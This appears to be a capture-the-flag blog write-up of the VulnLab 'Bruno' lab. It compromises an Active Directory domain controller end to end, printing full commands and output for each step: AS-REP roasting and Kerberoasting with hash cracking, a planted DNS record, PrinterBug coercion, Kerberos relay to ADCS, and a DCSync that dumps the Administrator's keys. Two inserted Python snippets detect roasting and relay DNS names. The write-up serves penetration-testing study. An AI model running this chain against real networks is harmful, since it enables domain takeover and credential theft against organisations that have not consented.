VulnLab Bruno

Recon

└─$ rustscan -a 10.10.81.38 -r 1-65535 -g  
10.10.81.38 -> [21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,3389,5357,5985,9389,49664,49667,49668,49682,49683,51136,51155,51263]
       
└─$ nmap -sC -sV -p21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,3389,5357,5985,9389,49664,49667,49668,49682,49683,51136,51155,51263 10.10.81.38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-22 21:53 +06
Nmap scan report for 10.10.81.38
Host is up (0.12s latency).

PORT      STATE    SERVICE          VERSION
21/tcp    open     tcpwrapped
53/tcp    open     tcpwrapped
80/tcp    open     tcpwrapped
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open     tcpwrapped
135/tcp   open     tcpwrapped
139/tcp   open     tcpwrapped
389/tcp   filtered ldap
443/tcp   open     tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after:  2121-06-29T13:33:00
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
445/tcp   open     tcpwrapped
464/tcp   filtered kpasswd5
593/tcp   filtered http-rpc-epmap
636/tcp   filtered ldapssl
3268/tcp  filtered globalcatLDAP
3269/tcp  filtered globalcatLDAPssl
3389/tcp  open     tcpwrapped
| rdp-ntlm-info: 
|   Target_Name: BRUNO
|   NetBIOS_Domain_Name: BRUNO
|   NetBIOS_Computer_Name: BRUNODC
|   DNS_Domain_Name: bruno.vl
|   DNS_Computer_Name: brunodc.bruno.vl
|   DNS_Tree_Name: bruno.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-05-22T15:52:08+00:00
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2025-05-21T15:37:34
|_Not valid after:  2025-11-20T15:37:34
|_ssl-date: 2025-05-22T15:52:41+00:00; -1m31s from scanner time.
5357/tcp  filtered wsdapi
5985/tcp  open     tcpwrapped
9389/tcp  open     tcpwrapped
49664/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49682/tcp filtered unknown
49683/tcp filtered unknown
51136/tcp filtered unknown
51155/tcp filtered unknown
51263/tcp filtered unknown

Host script results:
| smb2-time: 
|   date: 2025-05-22T15:52:05
|_  start_date: N/A
|_clock-skew: mean: -1m30s, deviation: 0s, median: -1m31s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds

└─$ nxc smb 10.10.81.38 -u 'Guest' -p ''
SMB         10.10.81.38     445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.81.38     445    BRUNODC          [-] bruno.vl\Guest: STATUS_ACCOUNT_DISABLED 
   

Anonymous FTP login is enabled:

└─$ ftp anonymous@10.10.81.38
Connected to 10.10.81.38.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> cd app
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||52157|)
150 Opening ASCII mode data connection.
06-29-22  05:42PM                  165 changelog
06-28-22  07:15PM                  431 SampleScanner.deps.json
06-29-22  03:58PM                 7168 SampleScanner.dll
06-29-22  03:58PM               174592 SampleScanner.exe
06-28-22  07:15PM                  170 SampleScanner.runtimeconfig.dev.json
06-28-22  07:15PM                  154 SampleScanner.runtimeconfig.json
226 Transfer complete.
ftp> 
 

User

Inside the app directory we find a changelog file that contains the username svc_scan:

ftp> more changelog
Version 0.3
- integrated with dev site
- automation using svc_scan

Version 0.2
- additional functionality 

Version 0.1
- initial support for EICAR string

Let’s

└─$ kerbrute userenum -d bruno.vl users.txt --dc brunodc.bruno.vl

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 05/22/25 - Ronnie Flathers @ropnop

2025/05/22 22:13:15 >  Using KDC(s):
2025/05/22 22:13:15 >   brunodc.bruno.vl:88
                                                                                                                                             
2025/05/22 22:13:15 >  [+] VALID USERNAME:       svc_scan@bruno.vl
2025/05/22 22:13:15 >  Done! Tested 1 usernames (1 valid) in 0.291 seconds

We see that the user is valid. Let’s try AS-REP Roasting:

└─$ GetNPUsers.py -usersfile users.txt -outputfile hash -request -format hashcat -dc-ip 10.10.81.38 bruno.vl/                             
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/home/kali/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc_scan@BRUNO.VL:4fb4b8bed2e653876c768636228de20d$78cf20e11d26d3f4fe1f41cd6904347daa43bb1ec103f7d76d11157a90a4cddcaf8d65d0385422440718f5fc39cc24a7ba438921c29762392c32044ffe68ffcf23d1263d0d3c56e97156143466ecccc1e1b29038f70525912ef7d21368370184265fcb6439457614af48637ecdfd969590f226c7f9df748fc992a24020ed501d68d8cf607318cde7df4700fe3662db4f17e1bd4c6f7dbc4c6c7bbdbad1f5fc8a2948e30b46ead8bf0dd49d91ba95b2c73b2dbbbf1d01a766cfe059b1e14b34f8babdbe850250a7e1e8a25ac4f5565c2bf3390cedaed9c6cecdf151ab4a11049ad080b586

The hash is crackable:

└─$ hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$svc_scan@BRUNO.VL:4fb4b8bed2e653876c768636228de20d$78cf20e11d26d3f4fe1f41cd6904347daa43bb1ec103f7d76d11157a90a4cddcaf8d65d0385422440718f5fc39cc24a7ba438921c29762392c32044ffe68ffcf23d1263d0d3c56e97156143466ecccc1e1b29038f70525912ef7d21368370184265fcb6439457614af48637ecdfd969590f226c7f9df748fc992a24020ed501d68d8cf607318cde7df4700fe3662db4f17e1bd4c6f7dbc4c6c7bbdbad1f5fc8a2948e30b46ead8bf0dd49d91ba95b2c73b2dbbbf1d01a766cfe059b1e14b34f8babdbe850250a7e1e8a25ac4f5565c2bf3390cedaed9c6cecdf151ab4a11049ad080b586:<REDACTED>

Run BloodHound to collect domain data using the acquired credentials:

└─$ bloodhound-ce-python -d 'bruno.vl' -u 'svc_scan' -p '<REDACTED>' -c all -ns 10.10.81.38 --zip --dns-tcp --dns-timeout 60 -v 

We can also try Kerberoasting:

└─$ GetUserSPNs.py 'bruno.vl/svc_scan':'<REDACTED>' -dc-ip 10.10.81.38 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName   Name      MemberOf  PasswordLastSet             LastLogon                   Delegation 
---------------------  --------  --------  --------------------------  --------------------------  ----------
NET/brunodc.bruno.vl   svc_net             2022-06-29 19:35:45.023707  2022-06-29 22:29:25.394301             
SCAN/brunodc.bruno.vl  svc_scan            2022-06-29 19:36:15.210348  2025-05-22 22:30:54.739587

<SNIP>

The hash for svc_net is also crackable:

└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$68b7d03c0476045bda2d41c852e49101$<SNIP>:<SNIP>
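
Both roasts above leave a footprint on the DC: a 4768 with pre-authentication type 0 for svc_scan and a 4769 for the user-account SPN svc_net, both issued with RC4 (etype 0x17 = 23, the "23" in the hash formats). The following Python is an added detection example, not code from this post; it classifies constructed 4768/4769 events using the Security log field names, and the events and client addresses are made up.

```python
"""Flag Windows Kerberos events (4768 / 4769) that match the roasting seen on
this box: an AS-REP for svc_scan with pre-auth off and a TGS for svc_net, both
RC4 (etype 0x17 = 23, the '23' in $krb5asrep$23$ / $krb5tgs$23$).
Events here are constructed dictionaries, not parsed from a real EVTX file."""
from collections import defaultdict

RC4_HMAC = "0x17"   # etype 23: what hashcat modes 18200 / 13100 crack
NO_PREAUTH = "0"    # PreAuthType 0 in event 4768: DONT_REQ_PREAUTH is set

# Constructed sample events (not the target's real logs).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_scan", "PreAuthType": NO_PREAUTH,
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.8.4.147"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.81.50"},
    {"EventID": 4769, "TargetUserName": "svc_scan@BRUNO.VL", "ServiceName": "svc_net",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.8.4.147"},
    {"EventID": 4769, "TargetUserName": "svc_scan@BRUNO.VL", "ServiceName": "BRUNODC$",
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.8.4.147"},
    {"EventID": 4769, "TargetUserName": "jdoe@BRUNO.VL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.81.50"},
]


def classify(event):
    """Return 'asrep_roast', 'kerberoast' or None for one event."""
    etype = event.get("TicketEncryptionType")
    if event["EventID"] == 4768:
        # AS-REP roasting needs pre-auth off; RC4 makes the hash cheap to crack.
        if event.get("PreAuthType") == NO_PREAUTH and etype == RC4_HMAC:
            return "asrep_roast"
    elif event["EventID"] == 4769:
        svc = event.get("ServiceName", "")
        # An RC4 service ticket for a *user* SPN (not krbtgt, not a machine
        # account ending in '$') is the Kerberoasting signature.
        if etype == RC4_HMAC and svc.lower() != "krbtgt" and not svc.endswith("$"):
            return "kerberoast"
    return None


def analyse(events):
    """Map finding label -> sorted 'account <- client_ip' strings."""
    findings = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label:
            who = ev["ServiceName"] if label == "kerberoast" else ev["TargetUserName"]
            findings[label].add(f"{who} <- {ev['IpAddress']}")
    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    for label, hits in analyse(SAMPLE_EVENTS).items():
        print(label, hits)
```

Fixing the root cause is cheap on the defender side: clear DONT_REQ_PREAUTH on svc_scan and give both service accounts long random passwords or AES-only keys, which is why an RC4 4769 for a user SPN is worth alerting on.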

svc_scan has write permissions on the queue share:

└─$ nxc smb 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' --shares
SMB         10.10.81.38     445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         10.10.81.38     445    BRUNODC          [+] bruno.vl\svc_scan:<REDACTED> 
SMB         10.10.81.38     445    BRUNODC          [*] Enumerated shares
SMB         10.10.81.38     445    BRUNODC          Share           Permissions     Remark
SMB         10.10.81.38     445    BRUNODC          -----           -----------     ------
SMB         10.10.81.38     445    BRUNODC          ADMIN$                          Remote Admin
SMB         10.10.81.38     445    BRUNODC          C$                              Default share
SMB         10.10.81.38     445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         10.10.81.38     445    BRUNODC          IPC$            READ            Remote IPC
SMB         10.10.81.38     445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         10.10.81.38     445    BRUNODC          queue           READ,WRITE      
SMB         10.10.81.38     445    BRUNODC          SYSVOL          READ            Logon server share 

In my case, the box was solved in an unintended way. There is an intended method to get user (reverse engineer SampleScanner.exe and perform DLL hijacking using the write permission on the share) and root (Shadow Credentials/RBCD attack using KrbRelayUp). To check the intended solutions, please refer to the following blogs:

Root (Unintended way)

ADCS is installed:

└─$ nxc ldap 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -M adcs
LDAP        10.10.81.38     389    BRUNODC          [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
LDAP        10.10.81.38     389    BRUNODC          [+] bruno.vl\svc_scan:<REDACTED> 
ADCS        10.10.81.38     389    BRUNODC          [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.81.38     389    BRUNODC          Found PKI Enrollment Server: brunodc.bruno.vl
ADCS        10.10.81.38     389    BRUNODC          Found CN: bruno-BRUNODC-CA
ADCS        10.10.81.38     389    BRUNODC          Found PKI Enrollment WebService: https://brunodc.bruno.vl/bruno-BRUNODC-CA_CES_Kerberos/service.svc/CES
└─$ certipy find -u 'svc_scan@bruno.vl' -p '<REDACTED>' -ns 10.10.81.38 -dc-ip 10.10.81.38 -stdout -dns-tcp -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'bruno-BRUNODC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'bruno-BRUNODC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'bruno-BRUNODC-CA' via RRP
[*] Got CA configuration for 'bruno-BRUNODC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : bruno-BRUNODC-CA
    DNS Name                            : brunodc.bruno.vl
    Certificate Subject                 : CN=bruno-BRUNODC-CA, DC=bruno, DC=vl
    Certificate Serial Number           : 52D11B2B5CC276A54DE5B77F5E125E8D
    Certificate Validity Start          : 2022-06-29 13:23:01+00:00
    Certificate Validity End            : 2121-06-29 13:33:00+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : BRUNO.VL\Administrators
      Access Rights
        ManageCertificates              : BRUNO.VL\Administrators
                                          BRUNO.VL\Domain Admins
                                          BRUNO.VL\Enterprise Admins
        ManageCa                        : BRUNO.VL\Administrators
                                          BRUNO.VL\Domain Admins
                                          BRUNO.VL\Enterprise Admins
        Enroll                          : BRUNO.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates

After seeing ESC8, I tried multiple NTLM relay methods but had no success. Eventually, I managed to root the box using Kerberos relay.

The methodology is identical to the Cicada box:

└─$ nxc ldap 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -M maq
LDAP        10.10.81.38     389    BRUNODC          [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
LDAP        10.10.81.38     389    BRUNODC          [+] bruno.vl\svc_scan:<REDACTED> 
MAQ         10.10.81.38     389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         10.10.81.38     389    BRUNODC          MachineAccountQuota: 10

The blogs used to perform the Kerberos relay:

Create an A record pointing to our box; the name has to have the form described in the blogs. Knowing that by default all authenticated users can create an A record if it doesn’t already exist, we can abuse that:

└─$ bloodyAD --host 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -d 'bruno.vl' add dnsRecord 'brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147       
[+] brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
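
The relay hinges on a DNS node whose name is the DC’s host name followed by a marshalled target-info blob, registered by an ordinary authenticated user. As an added defender-side example (not code from this post or from krbrelayx), the Python below audits dnsNode names with that shape and notes who registered them; the records, host list and privileged set are constructed, and the base64-tail rule is a heuristic I am assuming here, not a documented signature.

```python
"""Heuristic audit of AD-integrated DNS node names for the marshalled target
name trick used in Kerberos relay: the record registered on this box was
brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA, i.e. the DC's host name
plus a base64 blob. Records, host list and privileged set below are constructed
samples (think a dnsNode listing or Directory Service event 5137), not code
from the blog or from krbrelayx."""
import re

# The record name from this page; everything after the host name is the blob.
RELAY_NAME = "brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
TARGET_INFO_SUFFIX = RELAY_NAME[len("brunodc"):]
B64_TAIL = re.compile(r"^[A-Za-z0-9+/=]{32,}$")   # long base64-alphabet tail

# Constructed sample dnsNode records: (name, creating principal, address).
SAMPLE_RECORDS = [
    (RELAY_NAME, "BRUNO\\svc_scan", "10.8.4.147"),
    ("brunodc", "BRUNO\\BRUNODC$", "10.10.81.38"),
    ("fileserver01", "BRUNO\\Domain Admins", "10.10.81.40"),
    ("brunodcQ3k9xZ2mN8pL4rT6vW0yB1cD5fG7hJ9kM2nP4qS6uV8wX0zA", "BRUNO\\jdoe", "10.8.4.200"),
]


def check_name(name, known_hosts):
    """Return the reasons a DNS node name looks like a relay target (empty if none)."""
    reasons = []
    if name.endswith(TARGET_INFO_SUFFIX):
        reasons.append("ends with the marshalled target-info suffix used in Kerberos relay")
    for host in known_hosts:
        tail = name[len(host):]
        # A real host name followed by a long base64-looking tail is the
        # generic shape of a marshalled target-info name, whatever the blob is.
        if name.lower().startswith(host.lower()) and B64_TAIL.match(tail):
            reasons.append(f"known host '{host}' followed by a {len(tail)}-char base64-like tail")
            break
    return reasons


def audit(records, known_hosts, privileged):
    """Map suspicious name -> reasons; note who registered it, since by default
    any authenticated user may create a dnsNode that does not exist yet."""
    findings = {}
    for name, creator, _addr in records:
        reasons = check_name(name, known_hosts)
        if reasons and creator not in privileged:
            reasons.append(f"registered by non-privileged principal {creator}")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    hosts, admins = ["brunodc", "fileserver01"], {"BRUNO\\Domain Admins", "BRUNO\\BRUNODC$"}
    for name, why in audit(SAMPLE_RECORDS, hosts, admins).items():
        print(name, "->", "; ".join(why))
```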

Make sure to pull the latest update of krbrelayx and start it before coercing. Then coerce the box using printerbug:

└─$ printerbug.py bruno.vl/svc_scan:<REDACTED>@10.10.81.38 'brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA'                              
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.81.38
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
└─$ krbrelayx.py -t 'http://brunodc.bruno.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'brunodc$'   
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.38
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.81.38
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.81.38
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 5
[*] Writing PKCS#12 certificate to ./brunodc$.pfx
[*] Certificate successfully written to file

We got the certificate; now we can authenticate with it and get the NTLM hash of the DC machine account:

└─$ certipy auth -pfx 'brunodc$.pfx' -dc-ip 10.10.81.38 -username 'brunodc$' -domain 'bruno.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: brunodc$@bruno.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brunodc.ccache'
[*] Trying to retrieve NT hash for 'brunodc$'
[*] Got hash for 'brunodc$@bruno.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

Perform DCSync and get the Administrator’s hash:

└─$ secretsdump.py 'bruno.vl/brunodc$'@brunodc.bruno.vl -hashes ':<REDACTED>' -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up... 

Connect to the box and get the flag:

└─$ evil-winrm -i 10.10.81.38 -u administrator -H '<REDACTED>'

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

https://api.vulnlab.com/api/v1/share?id=31bdaeec-0f8e-423c-9dec-eb3692477eed

This post is licensed under CC BY 4.0 by the author.